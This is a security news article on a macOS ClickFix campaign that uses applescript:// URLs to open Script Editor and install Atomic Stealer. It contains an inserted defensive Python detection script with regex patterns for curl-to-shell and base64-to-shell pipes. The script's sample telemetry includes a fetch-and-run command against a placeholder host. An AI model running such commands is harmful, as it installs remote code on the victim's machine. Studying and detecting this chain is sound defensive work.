ClickFix malware campaigns are evolving again, with threat actors removing one of their most obvious and user‑dependent steps: convincing victims to paste malicious commands into Terminal. Instead, the latest variant uses a single browser click to trigger script execution, streamlining the infection chain and reducing user hesitation.
Researchers at Jamf Threat Labs have identified a new macOS campaign that launches Apple’s native Script Editor directly from the browser, preloaded with malicious code. The technique abuses the applescript:// URL scheme to open Script Editor automatically, sidestepping Terminal entirely and delivering Atomic Stealer payloads with far less friction.
“Script Editor has a well-documented history as a malware delivery mechanism, so its presence here isn’t surprising,” the researchers said in a blog post. “What is notable is its role in this ClickFix campaign and the fact that it was invoked via a URL scheme.”
The payload isn’t new. It’s Atomic Stealer, a credential-harvesting strain commonly deployed in macOS-focused campaigns.
Apple drops protection, attackers go around it
Conventionally, ClickFix chains relied on social engineering to get users to paste obfuscated commands into Terminal. Apple’s recent protections introduced scanning and prompts around pasted commands, adding restrictions to disrupt that flow.
This campaign routes around it.
Victims are directed to an Apple-themed page posing as a system fix or cleanup guide. Instead of copying anything, they click a button that invokes an applescript:// URL. That action opens Script Editor with a pre-populated script, ready to execute.
By not directing the user to interact with the Terminal, the attacker has removed a decision point that Apple enforced with macOS Tahoe 26.4. “Apple took direct aim at this in macOS 26.4, introducing a security feature that scans commands pasted into Terminal before they’re executed,” the researchers added. “It’s a meaningful friction point, but as this campaign illustrates, when one door closes, attackers find another.”
Script Editor is a native macOS utility and doesn’t carry the same immediate suspicion as Terminal for non-expert users. However, macOS still offers some incidental resistance to this technique, even though it was not designed with this campaign in mind.
The researchers pointed out that the behavior of the Script Editor may vary depending on the macOS version. “On recent versions of macOS Tahoe, an additional warning prompt is presented, requiring the user to allow the script to be saved to disk before execution,” they said.
Lightweight staging for Atomic Stealer
Once executed, the AppleScript resolves to an obfuscated shell command. That command decodes a hidden URL, retrieves a remote payload using ‘curl’, and executes it via ‘zsh’. From there the chain follows the standard infostealer pattern: a ‘Mach-O’ binary is written to a temporary location, its file attributes adjusted, execute permissions set, and the binary launched.
This binary is a new variant of the Atomic Stealer.
The researchers noted that the staging approach keeps the initial script minimal and less detectable, while the actual malicious logic arrives separately. It is modular, quick to update, and harder to catch at the first stage.
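The staging chain described above (browser opens an applescript:// URL, Script Editor spawns a shell, the shell decodes a hidden URL and pipes remote content into zsh, and a binary in a temporary location has its attributes and permissions changed before it runs) leaves a distinctive trail in endpoint telemetry. The following Python script is an added detection example and is not code from Jamf Threat Labs or from the article: it runs a handful of behavioural rules over constructed process-creation and URL-open records and correlates them into a verdict. The record field names, the browser and shell lists, the applescript:// URL body, the temporary file name and the assumption that “attributes adjusted” means an xattr change are all my own choices, not details from the page.

```python
import re

# --- Assumed field layout of the telemetry (constructed for this example) ---
# url_open : {"id", "type", "proc", "url"}
# process  : {"id", "type", "parent", "proc", "cmdline"}

BROWSERS = {"Safari", "Google Chrome", "Firefox", "Microsoft Edge", "Arc", "Brave Browser"}
SCRIPT_HOSTS = {"Script Editor", "osascript"}   # processes that execute AppleScript
SHELLS = {"sh", "zsh", "bash"}

# Temporary locations commonly used on macOS (assumption: the article only says "temporary location").
TEMP_PATH = r"(/private)?/tmp/|/var/folders/|\$TMPDIR"

# Decoded text piped straight into a shell (the "obfuscated shell command" stage).
DECODE_TO_SHELL = re.compile(r"base64\s+(-d|-D|--decode).*\|\s*(sh|zsh|bash)\b")
# Remote content fetched with curl and piped into a shell (the "retrieve and execute" stage).
FETCH_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(sh|zsh|bash)\b")
# Attribute or permission changes on a file in a temp directory (the "prepare the binary" stage).
XATTR_TEMP = re.compile(r"\bxattr\b.*(" + TEMP_PATH + ")")
CHMOD_TEMP = re.compile(r"\bchmod\b\s+(\+x|[0-7]{3,4})\s+.*(" + TEMP_PATH + ")")


def match_rules(event):
    """Return the list of rule names that fire for a single telemetry record."""
    hits = []
    if event["type"] == "url_open":
        # A browser handing off to the applescript:// scheme is the campaign's entry point.
        if event["url"].lower().startswith("applescript://") and event["proc"] in BROWSERS:
            hits.append("browser_opens_applescript_url")
    elif event["type"] == "process":
        cmd = event.get("cmdline", "")
        if event["parent"] in SCRIPT_HOSTS and event["proc"] in SHELLS:
            hits.append("script_editor_spawns_shell")
        if DECODE_TO_SHELL.search(cmd):
            hits.append("decoded_text_piped_to_shell")
        if FETCH_TO_SHELL.search(cmd):
            hits.append("remote_content_piped_to_shell")
        if XATTR_TEMP.search(cmd) or CHMOD_TEMP.search(cmd):
            hits.append("temp_file_prepared_for_execution")
    return hits


def assess_chain(events):
    """Correlate per-event hits into a verdict for one host session.

    Returns (verdict, flagged) where flagged maps event id -> list of rule names.
    Three or more distinct stages firing is treated as the full ClickFix/Script Editor
    chain; one or two is merely suspicious (a lone curl | zsh has benign uses).
    """
    flagged = {}
    for ev in events:
        hits = match_rules(ev)
        if hits:
            flagged[ev["id"]] = hits
    distinct_rules = {rule for hits in flagged.values() for rule in hits}
    if len(distinct_rules) >= 3:
        verdict = "clickfix_script_editor_chain"
    elif distinct_rules:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, flagged


# Constructed sample telemetry (not captured from a real infection). URLs, encoded
# text and file names are placeholders; "UExBQ0VIT0xERVI=" is just base64("PLACEHOLDER").
SAMPLE_EVENTS = [
    {"id": 1, "type": "url_open", "proc": "Safari",
     "url": "applescript://PLACEHOLDER_SCRIPT_BODY"},
    {"id": 2, "type": "process", "parent": "Script Editor", "proc": "sh",
     "cmdline": "sh -c 'echo UExBQ0VIT0xERVI= | base64 -d | zsh'"},
    {"id": 3, "type": "process", "parent": "zsh", "proc": "zsh",
     "cmdline": "zsh -c 'curl -fsSL http://example.invalid/stage | zsh'"},
    {"id": 4, "type": "process", "parent": "zsh", "proc": "xattr",
     "cmdline": "xattr -c /private/tmp/.update_helper"},
    {"id": 5, "type": "process", "parent": "zsh", "proc": "chmod",
     "cmdline": "chmod +x /private/tmp/.update_helper"},
    # Benign control: a developer decoding a certificate in Terminal, no shell pipe.
    {"id": 6, "type": "process", "parent": "Terminal", "proc": "zsh",
     "cmdline": "zsh -c 'base64 -d cert.b64 > cert.pem'"},
    # Benign control: an ordinary https page.
    {"id": 7, "type": "url_open", "proc": "Safari", "url": "https://support.apple.com/"},
]

if __name__ == "__main__":
    verdict, flagged = assess_chain(SAMPLE_EVENTS)
    print("verdict:", verdict)
    for event_id, rules in sorted(flagged.items()):
        print(f"  event {event_id}: {', '.join(rules)}")
```

The correlation step matters more than any single rule: `curl ... | zsh` or a base64 decode on its own is noisy in developer environments, but a browser handing off to applescript://, Script Editor spawning a shell, and a freshly written temp file being made executable rarely appear together in one session for a benign reason. In a real deployment the rules would be fed from the EDR or unified-log event stream rather than the inline sample list.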
Atomic Stealer’s objectives are consistent with earlier macOS infostealer campaigns, which focused on harvesting browser credentials, saved passwords, crypto wallet data, and developer artifacts. Previous reporting has shown that such stealers rarely operate in isolation, as exfiltrated data is almost always funneled into credential reuse attacks and account takeovers.
Original article: Weak at the seams | CSO Online